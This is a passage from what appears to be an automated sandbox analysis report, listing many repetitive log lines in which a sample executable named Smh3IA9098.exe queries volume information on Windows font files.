Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Smh3IA9098.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
